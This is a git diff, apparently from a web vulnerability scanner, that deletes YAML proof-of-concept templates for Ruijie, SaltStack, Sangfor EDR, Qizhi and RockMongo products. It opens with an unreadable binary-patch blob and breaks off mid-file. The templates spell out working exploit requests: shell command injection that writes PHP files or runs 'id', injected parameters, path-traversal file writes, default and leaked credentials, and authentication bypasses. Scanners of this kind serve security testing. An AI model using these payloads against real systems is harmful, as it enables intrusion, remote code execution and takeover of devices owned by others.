zf>4>ix5{N!L+jVR%)W0ZN{X9P0i9$Cucaebhv0iP+{eYE-79JRLqa0vo5rBFgY>iK zmrEy&Zzpy&VOIb!lSBK;35=c>xn8~eC&E+OAIf+Y>uHG#A75q&RF0K+Py-_NR`_i2 ztzQ&>wO5V(acz;qd{oE^=-V17L74w6nLG%lx`@GU;(G3{_Q8Xxmet3)ZV;90jbQZ(@B#Zz)vh2e7^WbN0rsi9uH3HyT~*$3tKeDerEZ>YoiG%|}?SELIC_HQUF~F#(ca zBLzEmT@^(ywPD#lcbzYWAiXT#@iT`zO9qg7wBHzAar~?XO)qfkzdUw!=t1r=2k>jsf!UOO&*O1awZu%~S$zZEZd3nuS?_)Q$*qK}9=+Uf5F!cY zS}_H*Ez>5nnx&k)5Ff%xu9KB>1Fg=c*4}qJTi;BuPWTxJw4@G7wZh_&WQq?d0v0T_ 
zM(T7%?hp6&(j;{+ZcD&P2z0PkI)D94?VEAk^lfh1+;3^&c;_R-6!W~$@lcWIVWh(z zSd4A^9LB6v+Zp$yw{1KUPC=Kf?fG=D?cG=ztRZ-#NVjT%QsAc#!H_UMSNP4xOLms{ ztVPmu5H#u+K4(M>k+lvU0p1=Pn-_P}A6qbWRSCl(fbNz7-H`$T?Ek4d7c*-^8<*cO zfn|!a7Jt2Xzaa6`w$#>Ng5-T|c9)WthUTjcs@L?j3^&NDCS|R$u&KE}!z&Z%AmkE* zgl^+tiFD&F_#8!iN4`08w)pDJBOUU# z06XL8#?WYLY%@jEwmPrIkW5+sK=}|=b^l<0CQ(7wbxFHV`>yYx*NM>HhtyLROQoiz ze(l>roN<--z8`X<_lt7d_S;&f%hF-S@bZzT!V7&7OHR#Pu79Tf%oACwo_(y<4!LHz zK>KphU9)Sw4%5Y>-R<=Fz|r)Vp9}r*4GpUvF1J?@v;^xV*9xiagBBvf0fe?VzLCAw zxCoJr=kVg}%m>@ImVN!EpN8?bv+G-}?`V1{Dsr_hBHF+Z|RV6_7^~_DuG~B-+v@{-l#xBf!%9@#=>_@j>!mUE1jVSsVZN zEerrFd;lELOJYkvE#BKXIkx_QJfYnE6R0YD*?Z+}JNp=m?eU0k&n!{e7tcihViDn) z#-QE{;K|hfP>zJHZ!9}ZlZC$F+Xy)j{=J(FCCwIHR}#FncKGY@&rZ<(Ajq&Lh0#<> z=A4RA3@vKjD+)ghtg|RLpQoXyExHsLxu70|h-Z)%MIW0ZhkOu+*uLY>b~U*;Ff@#j z>ZX0z!mgG5n_3(jl@``|UC?p)Q0(i@SX^J>v^1;2C-Ma;qZnwUi=B$(HH5%b`_0m! z(UcOBst4cSgek2GU&wBOXPJChz*Hgac;VFC{PF9_ql(SSNNTt^>FGy{3+ETvoAwF@ zVC%q$gxL5C+gu~-5u5l`e(AjvW@Mzb@*Nx&#Kem9N&YaHanx(Mtpq@Pp-E;wmyB+XQ zoGIyLoQ}7cr%oA)X;oPqpgh zSuk93KXyMcvhV1~bMyQxQv3WzzT~`Spb-bm*Hw+(jLGft|Uqjkkml(FBe9fJoTgfps%pRoNT8hf}p!pt_h`W$ez5Bg0-$hM}t&a zMSW;wl#O6-z@Q;^2&0f-C>eLEb2DVWsR2rv0NYQj3KCzBbbNBRiMoz0nfIxxnoR?= zs(c5W(QEi-DSASET}@(I#=C~C-ddDCrUp6x~UoTbuBmRF1lW;}Z(AVS$Jf-5$Mg!;V+1=F+ z`{<4pr4W6l?ruCD2T%4~I?ZoYykQYUc!^Hov}D0kx_r%^9sBXP zO%6&IZaqCHWOby&orJ%qheN<9y_a*GOI}JGxIRb6n<&9mds?9MDwS*VA;t464R?O8 zc0p*r)nn;7o_>ev)I@+OQ4JzjU+?GeAqu!Firn4qF>MmHsCwDW{E0Re7ow={TeaVC z^f>v{_>va=p>7fBy?!5FFfD4yuA*pkV^f?xEdukxVkI;D+Ro+v*xEzTh}7H9dmCBX z%3$AJ(8lkDaU-{k(%=vADqXAJ%a3A)9_;+FSWDJextRzk5e(wZ8-o9-NM|O-|1sud zWajw2!5<#C@fvCeHlptcN{>NY-=|_ona!%|<4xnUcV%L~pYc!KF=fW(sZOiit=Qn| zV9ln_MwGR`ZL%4U=%7%802wmcIaTjpqx09Yo*oRBvK@FfJ&brfcN86@ASV3~aF4zi z684Sq-qRx&27#NCpSYI{D@n8;q^ZSI%>e8R7mK9eeu4$Ce3nH+rIHF`oZB2bTzbnj z`{^w$gbK7uM?4yYzg=|a54dBvHKW$?K<0Hw!-M)`E$IY5NA2MBWAAEwN);;hg%5e9|Fh0YEii z4|V6W6F$Ktp+EIV)u$#hhfDT;n};0`=N<3u*Q9{zldExqrJ#=Mj_25HE|#|LEIn+s zIuN|Uccc#p1TBJ;Cxdj*OloCBgxIa&uTv?i%9Ek0x6y>ZeMf@Z+fNE>GC!Y79Jtnf 
ze!he<5-dOpVkJXcN9G5kH#!>Zt$G(v4aXz$96uQgam z&5(C?8Kvh-H%J-5!iUqk7IBdoXO+7-MKZC#*lgWK_e)#72Vv#9K)L>!CEb4qCtY-o zpdO%ncnkd(dcc2zlQR?ZKQ_%p$IQX}dt*FLb>;P@&QoHGK*seASn!Nv%bK{A`~m$I z2pBCoVbvl~@pw;YVy_6oUP z%@6`GJfH%H5`4n=s6=i=qYaBF38T69V?B_?JDJ--h*0N4C^GalNgl2*W+51lWl2K@ z!W>!;IAd^W?~AI18A;|Ki$)zAd|{G6M+BP$PdTEyy&3t5896{TMH-}a+)S8P`bf`l zj(?Ih4`Lq#ppjId`s0H{OQo7JT}ZLqGPEWR$xGM2t%|7V#ctFB5lWb}v%+_4Vk${e zO#4A82f1HYE?5j+$AD&ze{D`qZLXd&M!x8X#|hJe56?h3!VIoqfCBGxutwmIRY@2x z9pW54UG>xf(H0}zLm_`e3~rNggVP{9gk%yvP$X0|8&_Z5l_8wQnErJJyw3I*&2c!{M)fT z6BiJ1#Pa#Z@WjzdBCGEf>W1zYIX1B)=Z=qKeWj_r;J9w{D7NGnU91DaEEW8EBn))% z-Hmlk`gP;rNs_w_%zTQ+&<(1+Os#1@zdoTTMkLoPfZL`PNOH#uduv{D$Qa@(lbjOz zLa@jwxkDMRp6<#>A;^%5$1~=RnZBnxI2(#4G;!fXq?TtCKoWW(Uli%-(&~vsspTRr z;L=`iTfNOwkN*+d<)n?D&0fryFdV1fVjOAAQ;UqCuXhp6VagdW_=)F27*|tt8a8OQ z?YQq$A?=H>7+taZ+c_(RHq^qJFT&Rv%6njktwL$qse;!lYEP(zq3rYD--xXh69~{a z=p3%*+~VglIB(BRomfsd_B=-hwRCcDNIGEM;Jc`5xWo4i=+Oz!=rvjNR~QB!Rw?!? zHcGicw{|9X)C9jkX9vae7jgG#>GQ3wZaLATtyANnx+BsMSbi*5llDo=GovkTr}sJG z?4s=>RVTWd`GzUh=GB3Nz`b4*gvcz&;!_bI#$nES$Xhd6ZMC?bj zuFSmn$2>^JU@~)AdDSX~!5s!+ia`1O2!ppGg&yf6)*%P8Hfp|`c1S?=#}UqSqv_V+ zczsPjrVGvq4_|KGVRKWXs-&|Kgt2Wxj`MiAxlFuurTI2O1uboSvYNTL$u*<&?y~53 zi;EFtalYXOl-%1p&XO(>y|{V(koX%itQ0kDQZ^F{2c>#6!gpONWYJ`}FqEQ>O=lFk z#CHpIkSmh&+Of^}rbz=uphqzf+p zc~cnuvYOjrI44Q7&PjB2d|VNfc6$3Xvm7#Jlp-JV@YL5VY>}jeF$3Lpr{J`~C+&r~AP7+LC^yt+Rcl zg#B+kXX1M8M!&AK{ex64CjTEGDN#Nd8jWSEx3#L&JYm5&n2kjKtNq$Jd6IFBG!O36 z2|kDsTYI;b0`PP{Mw3Hyvs79+7A_5y50C4(u6Z6Ov3Eu ziP^+=j(6|yVTfquV{0f+=pd)0(jvI3!q+r8^@wCD;z7=LC$S|$52&~!#~FA*oZ8>y zWlPe9Dd!`$33HbY?v+C9+Pyt@*HXq#t0|DjCQ$~!Zet}w(ZN^B7c8spB&0~nCDpNH z3F~wdrYtHyIavx7&#eq<;NiZ_`nu)wj_#JZJg>W}n7C<$BECaZa_OxKJcJKTz$3*5 z;aA&H2}dYYdDJfnAm=gN*;6LC6DDt|MzQhy>F@UJRh{b=Z2OHw3_a8HDI{e-lE<6P z;9wwvkzKnnf2n+#U%T~0IhGek!9+c}J(_t~GpJ9Q@cP5cq|4=wEC6lz177xTjR4^0 zbb5w*wvJ}NQ_Rc?SR8WrXGcF=VaOWTGH(NTvN3{+adANpv4d4>WigBBp!SJX(3yuw zt86V7V0}6&pz}gGo$k;K6lwaAH@gZtaRizuW7?ZZ8k!YESXO6v)!WjBr_G49wbl;NhRu^55I 
zmt4|8l^PMV*obrE^^h9juD1vY7T;d04_C*#@(ELOCGLufbhGx(`%~tvc4GUB)zQRu zPqbn!eT+kccxzDP1mVeIoWG{4mo$*SAx3i^P`vGMz3yWed5S z$${N=74(ru-sU04E=RqB?0aY{b0D`(D8f{ofcAv0d1{ZBbr~}e5mrr83Pcs{AVXtQ zj2*eLg~`WtYcL~q2xSjWYGe7K9}%btQ8!cPU7H6(9G)#5K8t3?iLR>hC~XL*4=&p+ z12`V{xSMh%o*^rcY4dt*H_-p~AGh-!sU1LD#z0y0yUhQO|Ga9;O3%#lFK_yrX(>;s zE99@&8zQm1O}DB-s*>F{d|uqN$bqm(MJVl9zqyg*`)y95>yD4rvDPCx7|!%D8LTtXOVnS|popSQyE)2^r8pnSTK&3fYTJ6gRDNZ(-0KohkSrsJ5UFhJ~`sV2HgU(B&# z^wd3)-FlP|!5LARy|JKywSPHzpeJU+9cU(GndhP|6=EDrwZ0t&b0))diJ&HNq#Ue z!@whVhi_faGkhjvNn{jY>@0 z%IJ`JP03x+X&pm%wiUii)i)W(6doG4w{1|mHMFkLTR)#o?R}`QnYz)><)++^3EiuS z@f2_uzYo?C1#WT@6sYQb;>gr1R7pqD_Y1$C8zbe z2y6tv7;w{5{P)~0?IL!_0&^9ytX$P6#fLm|%tM;9nRA*ZlhpHY%-IC8*<0U5I%;P^ z50D5`QcdA2g#yRx6%F_Turqr&-3OJsUTARJ?6djrLN^+|MC{h8~Fmce5qTBv1V7IodL!u zYf_4CO|-~v9E@g7zS4c?*haG~#fF{!Z2Z|HIS(ioRFD)ATp>r$V;EoQpA$aXBB|aT z#~cn&NwCKdzFeYSIEVfOHrc3Ad{zhCKCl%ZnM6yK&hfxLcKV*0zmy}g{H%E4-;U$D z{{!^_@3~{%4^R>}prqGD?thfz#7PJAM*)H&vsa~9$;(;*=V`C47e|FkJu5P^Y9}~7 zyAT(3N?-$(52H`jfGtM6&QRlayTj#}^=fil@7;RqH@8c;1!6LckiuOJF}fsASlL-p zox`cQwHnX>V1e z)K=b_fSbYx@^R(|m?dG34|Q|YZ}RHcSdPr_GXpj3XESx?+xWB`{ zUGr1?>G&~JaX$MeJ=v`mmz`yZi6-nGX;NG((JUk}Mi^?<R9vmLmAr+m4fIBq44!kx`j7E= zJZ-jQW1IU5d%%k4VJz?9BFsId0YgZLHnbbvnKiP}QP>Zb=3!H3xl1nX)G0&Z%MC{- zq1X;jrkv2!smD}$V^-;?S+e2L}xYfBpy2)?fcDWJAj*D?WI3((xF+UOi@{wYX36{T%f0N_Q;!7oT2?_>47 zj1v1RwOu{o`Vt_wEEnnIE!o)t+zwF+_U6aiA!on*pm@xXM}7t3dpiwp390BLc)Fw| zsP(VIt3%VJ<+9h^_NW0=sPD8W1#N7FzB=*|Q+*ISAGF)yj<^hvsSD?^z0j3cg;W06 zMGF3jTrrXs^IXHEHXe;7a#5Pmu%Wg`YgA`w$PN)h*-mJ93xo@TS?$qJpVO+qKXDcXW32#3TI3ki}( zhy?bynWyKouL%}a^uSt#$|ElWo4J~l0AmNcTi*mA02$)-2VjcDQ*k-+ujvfxP;4yyBSkvLI5s#4yjX5lNxB0bFfAN;sSkrTIPb zWO0Le6~!mLGwzln@Aw~D*VBpnHP@33`->6Vszt;`WSW6;p3$1;U(a1+G+`{nd z&2%BQ9nx>tAn~Kn`@9!3FC1c^%8Y{yEGY$Laz0Z;`L!P;&8tVjnGOgD^dr}mX+}|_ zr8>VgU$L6$7O3v@ME3X4oK6&JnW<;uEWi^ysP6bFeg**i+CL75z}lS1{un805Px+0 z1wv)6yI|=wv9oPi+nzij#e11=5Y{@E2%EozVy!6O9LJxFMBAFjq5XvZlG6v-2oD;? 
zq9s*U8q^(K5fJu`o?_m1c6ZWk0DWI7qvx~fXkw=MUF~fTI>TWwG&u4dwqFYmK-XKq z-qSe_den5oroq?!i;bYjT;Y8jzqbLg&@PU{(84hGAgM16W4tl9iXkImy-{>c4R>tH z(CVG91&00Hq9L}jh*>a(*&w@Hz`PavR4<A?3!nynTg(7~PHbm*@MOsu^xO%`#BS z8$C21R?l^68G-;0-Cx`;&N}%Q%{^VKOkX15ac3~?EMl$U(Hi#e=uTXU_9pEjxls?{ zUPQ1GM*^aWy+nf2sHbvtDn5y;DT8S*6QuCqNqqSu#9UFgzL)?OBnaRE{hhvFEy&t{ zou2J~8JsCuy>@e7DJCkZL5gZQC3Qc+`jrXO5r$(5aX=R-?)84e{;~Y+WKy*B#S=3K zfxF!@Vf_66ly)9aO<&&w5B}964iINupr$|PR}%sO)VgXN)mm_1Ra8O<5C{oE!cbd5 ztyO<2DArk(3b@cJ?kXxct5i`OD1vpNMGBURKt=2Sz9cWa_mU7!e(m`l&h6=WpWJ)j z9`}A4J#<*L`knuR`8jc`jvu$Z z={>R#%z-tr}RpC5n!$~M_CYI{%h=yK=Kyq@c4q~&(?EAw5vsb6-^ zyIU_h&Fgu%n18=<%Gs@hjx`ex`rz{8>{bJo=FZEJ-A)(nu>a5T($c5d*Gj^NXv*^! zSKN2{zn1G04-RpUpRg;Yzi`oj#vP|gxA)Jw-Y((Fn>%G4Tl;z*e!a1A)5;WH=amQD z-4jPv*&c6s`^2^QxiL?ijr@_26R@1ILd zNtu@_&e04i+b=r=$3ZcCIN`l?nryy9Gf=K0V~Gq-HYTpn^F)v^C-nNMIu zLFpU&hta1_^MXDZ-=uNNfo(>4*K{9bTU+!yy%bq_qG$P+FdBXg)zukB!+8>ae|Zci z(Wryr4x}8OSD|cU{;?=Ky>^c2orBhlnXqQ`X=U4LT!CG?K40wa`=-LCcuM!5G>80} zUq1F{%kI0K=Jbj`wyQiWD5}b>Q^;={-DHI$_CIMJJ|I`<%J)j@AD?K@s96M7?-{_=|WUh($&2uoYLl} ztdmE#>Q{1*zdhsA-U&UI2bJEaz0pTH$EH&c=exlP%X=kXI=sWrJ~~<YRayUp#V_XH{7X{lH1B54y4#m;9(j0dOLEu){sNzm$IW%KJFw@g z4e7;CUv{Ql;e2{?B+7b;UQD4dyLwmX?ixW%SfM~Day85=zg%-g`4mM^wE4T$ppV54 zs*?V3Ho0AzUQDje_H91hUwX8l@1*^=ii>hC*v^C0`Wws}#rWp(RIKZlPvf3HL7vt@m4YM%3^TxeUq z^1IHbSLO=bmS(wq&wuL6&q_>M^xFP??!c|J!ZBR4_CYzyU5lozy{cR@c-Pqt2M(0H zKfO0<*3rGcG{3v_#e>ELe6J;olh;Z1XFJ9=-~8yKim2APn>r2|xtQN4rQ?|FDWkj> z`0PwhxOU;c<2of2tNB@uua~U5n$)!FlGD`-E{zvwzD!?nC-_m+{J`F#NWZ^4#<%}u z&BSq`@6NBNX&n2X6&^>*vTyvjYjl(Rp|YIE7h8)IU2{i<nkI zHDRqc^dmroOQgYYVGZu7g))x|NbCK)N@uZqqDJEL+m#(dqZa+E`pD4goTh_NvevFp-o7`t0y?65xaXDb!S)~Txqe)>i2lY zqlf4LoCfrBqVyBO!yEMUO*4-RQ;1>+po@!(Nc%k48uf1eb5-pHz(??Pq<{tO0H|$? 
z`e7ARgNsSppj;&B)`Nz*E^1Tf5Ft>m!Pk!>`N4x-k^~LW#ZBPufgX>lG)gsW;*n4O z>VxAS!`gLRp-XW9fCXUJ-W0q5g3B;)Pm#Nr(}0KzYMz7 zNT7G1$V(ukijEv0jWj=6V3lyy!7{7jdT}bh5kStsM^~MlaL){qK!&1cI)-6F6#=)i z4KXc9&59cpXop@5#4-!y1Tj63Ls47oMrl?Ip-A+=2w9LEV!Xx@WVVOHxt+IMGh9-O;aAi#TWB(0_o?KUj4Zd1F56juZ7E{uz` zaL0do}5_Zs?CgH4QbCmdyCL9>lGu#&cjnG zJxTY+JxCT1pi;uBgVNVlUWdZJ{Q6+iahrxN&gR}Fd-G*frw^%V~ zOK-qkg3p0!ZIAo$crvLl6RyFfSt|W28^uHwl-$LrCrY0VC+BXQIt(IO>(zm}<|#1Q@eRL3I||FJGT$i+ z1}Ono1790TnW-}Y2eylr$)#bDCaW_p6zha#7ShV`lzS=w(mWUDl+~hLaaad+;I^TEUx9INsSb)-f;5!MA z7c7!Oj16hHBqErTC}TNo&QSwN% zWvZV^xpVHGF51i5)+jgd%Gw-f06BtkbpJPA#^cH5k>UXYE?lFwR+;6+i*5a(e00x% zp2u$p48#a5E5UCZOou&L%1|D5EhFmu-oaDvX+i_UBM4O4@Tz!g)M!TTrAb zP}?V3+VC9Z+c5107y6by1e%SJAr%oc(QMzl%%4VKnKh*U<>mMIfcgPGKGi42t9d+y zL>UkviADECq?$+w@5O~g>asp+AGaEr6jQKCvCL9))n^U+J3T1s3ymczTRSns67!GF z-uY-_cQ7;ux+5MLt!0KssA6LAh%JN-a>xgz2-IGZA-j|Y^UAMHMiC`~fk$`5zr`RP zx*3J`JpDCHXhjmXeL3w$EVBl+7xgOb4zO`XFrRsKFnJj07!C~(E;+*;E!L8_aBN8| zv#^0%Wbc0j*gk;K4dUQ@X#H>(OvTA!*bBD;cQ>OQI!v%cjPqW-KLv<|K%{2~E53n9 z1Tr=37r`*fDT4x|O?4{=57K7DGOHOsGr`^mR$@3R2`%V`j-Q{Z4tmz9jH8MtIiB-^Mx4x@my*NCKCX@cY; z&}NJvNm=={@vzM5^l#{AC1K#Cw?L!&E*QIhngau>i&!Yq%^~GVsX~J$L2LuSG)wd;Yd_pX;TN*uqdU!#H55Hk zrq+a8I@f3@HCf$r&nzIe2K&;(YfzGw8mZO<#B%-;X=s27w&P4JZf-$nLUgc)6~r=Y z-Y+MP3fu;$c2H^P{<(G?pj1*WRstIX(2bzEsuaaNh65FuA>t!heK5lkGj`v{4rqmA z59;-zTzY>!k2hC7FIdh6!r}wn&=FOLv~O5oC7c#ap{3!=U7P4cQIG|ZCIT1=5I1fGo% zuka@WPa}bbpo|KD5PYzIA#`;U86DfOJS?-GTQSvU0UBW?(EjMQuptFbH6#jkq#Bxe z-DJhZ&Ben-*Si_Q!`G*%Ik5Ep<4@WEcsYEuKV#Am7zSAAS!4mQA~&r6bseqAMJvYO zYJ_E0-;~~Q6V-r3wUr(YukWO>(ny$qny9eN)U+qfk!*JO1-H^GNRwiA(lu=UAynz(FBtP+=~AJ8Ftd#IuGUP{TnI#!4zhU%h;$h4$_ zUAEB9!#{#mP&oD4F=Wz?P)%s)>7NZy+yn)j*u~Yw{8=;$#WD+>79$zZ1)!)&(B1Xa zg9a#$lZqdc)u){~P}}>78S?;wE^E*WhMgG%NDXgrlqz%n!-Zr2VVTuxRNFmUZviYB zVDyZ7`e6giFuKZ&?(T5sXqRD`dEO31+L;~ZVVULKSpQ9W2jHP|Nt*ZQl6juc=#&?i zZ;AKEq3?51$J+<=qeo5AuXQ|K`x0}mp6=RIY1U{)=ep;E8__?`@MT>wkm~hWLv^AP z#*?JttC(aWeLSgDfIICjEVJ&S)3KANzjMr>j2bpB8@me2EQ?NaPO_R_!z{8U5=qak 
zQH{>}P2vKt1CGrBZViIYb4?=hb7_Q;(V}M44#F~PG&(^tiLimoFLhez(?>y9G#w(L}lJJjWQZ}SrnF81Jc<} zNz}c3(7eE8gD5ITJTr@TymRS^?h>=81DT0h7X45i~4GWiTiA5(B zBw3XY^(-RApfvG()e%^liBSZ3`;rnsq>6|qzI$;{g z@_JgwGL=5f8XBEdjHGRPM$n9Nj9CMtvt^O60nY(uGItiq$$G1E*X~^13=_+&yXe$X zBuD-NIQ1o(vIa+IMf_?y!McvluR?O2$_?ClvaMLdr1ON3%$!#Z&KhD3n9f>3f{#_0&S61P zo{gnlY0ji{UIdbI^0iR}`nsJ;v!~@O7t5?G=}ZA6*ZECDxJL6V48nC6%Pg1Ld39}UO+ZrYvo0??WzpsZ$M5?xiN=H#9sSo}& zQ0t4SOhRop(0;`-YhF4gF9~gAV^bF*R$rNk2))+8=m@kVEFPY37|tBfkK}c2uH}Wv4c7{pxOvv# z=pb$+uA&9t3?Zou+q%Xf-K@dVk;+KyVmLRd!`2hGjKp%qv@@~H8kY{aMPh{xEY>Ih zmnq;cRk{hKIUpUvi3Co9ixoIlQ2ha&tl`p8iAZiW96Vw!9izw^4jo2^lWO_$EzZTbY*x|Be{O<2`kP4Q}55 E19axX+5i9m literal 0 HcmV?d00001 diff --git a/WebScan/pocs/qizhi-fortressaircraft-unauthorized.yml b/WebScan/pocs/qizhi-fortressaircraft-unauthorized.yml deleted file mode 100644 index 9bc1287..0000000 --- a/WebScan/pocs/qizhi-fortressaircraft-unauthorized.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-qizhi-fortressaircraft-unauthorized - -rules: - - method: GET - path: >- - /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm - expression: | - response.status == 200 && response.body.bcontains(b"错误的id") && response.body.bcontains(b"审计管理员") && response.body.bcontains(b"事件审计") -detail: - author: we1x4n(https://we1x4n.com/) - links: - - https://mp.weixin.qq.com/s/FjMRJfCqmXfwPzGYq5Vhkw \ No newline at end of file diff --git a/WebScan/pocs/rockmongo-default-password.yml b/WebScan/pocs/rockmongo-default-password.yml deleted file mode 100644 index c0b3566..0000000 --- a/WebScan/pocs/rockmongo-default-password.yml +++ /dev/null 
@@ -1,12 +0,0 @@
-name: poc-yaml-rockmongo-default-password
-rules:
- - method: POST
- path: /index.php?action=login.index&host=0
- body: more=0&host=0&username=admin&password=admin&db=&lang=zh_cn&expire=3
- follow_redirects: false
- expression: |
- response.status == 302 && response.headers["location"] == "/index.php?action=admin.index&host=0"
-detail:
- author: B1anda0(https://github.com/B1anda0)
- links:
- - https://www.runoob.com/mongodb/working-with-rockmongo.html
\ No newline at end of file
diff --git a/WebScan/pocs/ruijie-eg-info-leak.yml b/WebScan/pocs/ruijie-eg-info-leak.yml
deleted file mode 100644
index 1150806..0000000
--- a/WebScan/pocs/ruijie-eg-info-leak.yml
+++ /dev/null
@@ -1,24 +0,0 @@
-name: poc-yaml-ruijie-eg-info-leak
-rules:
- - method: POST
- path: /login.php
- headers:
- Content-Type: application/x-www-form-urlencoded
- body: |
- username=admin&password=admin?show+webmaster+user
- expression: "true"
- search: |
- {"data":".*?(?P\w+)\s?(?P\w+)","status":1}
- - method: POST
- path: /login.php
- headers:
- Content-Type: application/x-www-form-urlencoded
- body: |
- username={{username}}&password={{password}}
- expression: |
- response.status == 200 && response.body.bcontains(b"{\"data\":\"0\",\"status\":1}")
-detail:
- author: Search?=Null
- description: "Ruijie EG网关信息泄漏"
- links:
- - https://mp.weixin.qq.com/s/jgNyTHSqWA5twyk5tfSQUQ
\ No newline at end of file
diff --git a/WebScan/pocs/ruijie-eg-rce.yml b/WebScan/pocs/ruijie-eg-rce.yml
deleted file mode 100644
index 2aac600..0000000
--- a/WebScan/pocs/ruijie-eg-rce.yml
+++ /dev/null
@@ -1,29 +0,0 @@
-name: poc-yaml-ruijie-eg-rce
-set:
- r1: randomLowercase(4)
- r2: randomLowercase(4)
- phpcode: >
- ""
- payload: base64(phpcode)
-rules:
- - method: POST
- path: "/guest_auth/guestIsUp.php"
- headers:
- User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
- Accept-Encoding: "gzip, deflate"
- Content-Type: "application/x-www-form-urlencoded; charset=UTF-8"
- body: |
- ip=127.0.0.1|echo '{{payload}}' | base64 -d > {{r2}}.php&mac=00-00
- expression: |
- response.status == 200
- - method: GET
- path: "/guest_auth/{{r2}}.php"
- headers:
- User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
- Accept-Encoding: "gzip, deflate"
- expression: |
- response.body.bcontains(bytes(r1))
-detail:
- author: White(https://github.com/WhiteHSBG)
- links:
- - https://xz.aliyun.com/t/9016?page=1
\ No newline at end of file
diff --git a/WebScan/pocs/ruijie-nbr1300g-cli-password-leak.yml b/WebScan/pocs/ruijie-nbr1300g-cli-password-leak.yml
deleted file mode 100644
index e3a3d68..0000000
--- a/WebScan/pocs/ruijie-nbr1300g-cli-password-leak.yml
+++ /dev/null
@@ -1,15 +0,0 @@
-name: poc-yaml-ruijie-nbr1300g-cli-password-leak
-rules:
- - method: POST
- path: /WEB_VMS/LEVEL15/
- follow_redirects: false
- headers:
- Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
- body: |
- command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
- expression: |
- response.status == 200 && response.body.bcontains(bytes("webmaster level 2 username guest password guest"))
-detail:
- author: abbin777
- links:
- - http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7NBR%201300G%E8%B7%AF%E7%94%B1%E5%99%A8%20%E8%B6%8A%E6%9D%83CLI%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
diff --git a/WebScan/pocs/ruijie-rce-cnvd-2021-09650.yml b/WebScan/pocs/ruijie-rce-cnvd-2021-09650.yml
deleted file mode 100644
index 579c15e..0000000
--- a/WebScan/pocs/ruijie-rce-cnvd-2021-09650.yml
+++ /dev/null
@@ -1,20 +0,0 @@
-name: poc-yaml-ruijie-rce-cnvd-2021-09650
-set:
- r1: randomLowercase(9)
-rules:
- - method: POST
- path: /guest_auth/guestIsUp.php
- body: mac = 1 & ip = 127.0.0.1 | id > {{r1}}.txt
- follow_redirects: false
- expression: |
- response.status == 200
- - method: GET
- path: /guest_auth/{{r1}}.txt
- follow_redirects: false
- expression: |
- response.status == 200 && response.body.bcontains(b"uid")
-detail:
- author: jdr
- info: CNVD-2021-09650(Ruijie-EWEB网管系统 RCE)
- links:
- - https://github.com/opsxcq/exploit-CVE-2014-6271/
\ No newline at end of file
diff --git a/WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml b/WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml
deleted file mode 100644
index 6aa046e..0000000
--- a/WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml
+++ /dev/null
@@ -1,11 +0,0 @@
-name: poc-yaml-ruijie-uac-cnvd-2021-14536
-rules:
- - method: GET
- path: /login.php
- follow_redirects: false
- expression: |
- response.status == 200 && response.body.bcontains(b"RG-UAC登录页面") && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body)
-detail:
- author: jweny(https://github.com/jweny)
- links:
- - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247483972&idx=1&sn=b51678c6206a533330b0279454335065
\ No newline at end of file
diff --git a/WebScan/pocs/saltstack-cve-2021-25282-file-write.yml b/WebScan/pocs/saltstack-cve-2021-25282-file-write.yml
deleted file mode 100644
index 63f6a1b..0000000
--- a/WebScan/pocs/saltstack-cve-2021-25282-file-write.yml
+++ /dev/null
@@ -1,22 +0,0 @@
-name: poc-yaml-saltstack-cve-2021-25282-file-write
-set:
- r1: randomLowercase(5)
-rules:
- - method: GET
- path: /run
- follow_redirects: false
- expression: |
- response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"wheel_async") && response.body.bcontains(b"runner_async")
- - method: POST
- path: /run
- headers:
- Content-type: application/json
- body: >-
- {"eauth":"auto","client":"wheel_async","fun":"pillar_roots.write","data":"{{r1}}","path":"../../../../../../../../../tmp/{{r1}}"}
- follow_redirects: false
- expression: |
- response.status == 200 && response.content_type.icontains("application/json") && "salt/wheel/d*".bmatches(response.body)
-detail:
- author: jweny(https://github.com/jweny)
- links:
- - https://www.anquanke.com/post/id/232748
\ No newline at end of file
diff --git a/WebScan/pocs/sangfor-edr-arbitrary-admin-login.yml b/WebScan/pocs/sangfor-edr-arbitrary-admin-login.yml
deleted file mode 100644
index 43debed..0000000
--- a/WebScan/pocs/sangfor-edr-arbitrary-admin-login.yml
+++ /dev/null
@@ -1,13 +0,0 @@
-name: poc-yaml-sangfor-edr-arbitrary-admin-login
-rules:
- - method: GET
- path: /ui/login.php?user=admin
- follow_redirects: false
- expression: >
- response.status == 302 &&
- response.body.bcontains(b"/download/edr_installer_") &&
- response.headers["Set-Cookie"] != ""
-detail:
- author: hilson
- links:
- - https://mp.weixin.qq.com/s/6aUrXcnab_EScoc0-6OKfA
diff --git a/WebScan/pocs/sangfor-edr-cssp-rce.yml b/WebScan/pocs/sangfor-edr-cssp-rce.yml
deleted file mode 100644
index 4dafccb..0000000
--- a/WebScan/pocs/sangfor-edr-cssp-rce.yml
+++ /dev/null
@@ -1,15 +0,0 @@
-name: poc-yaml-sangfor-edr-cssp-rce
-rules:
- - method: POST
- path: /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9
- headers:
- Content-Type: application/x-www-form-urlencoded
- body: >-
- {"params":"w=123\"'1234123'\"|id"}
- expression: >
- response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"uid=0(root)")
-detail:
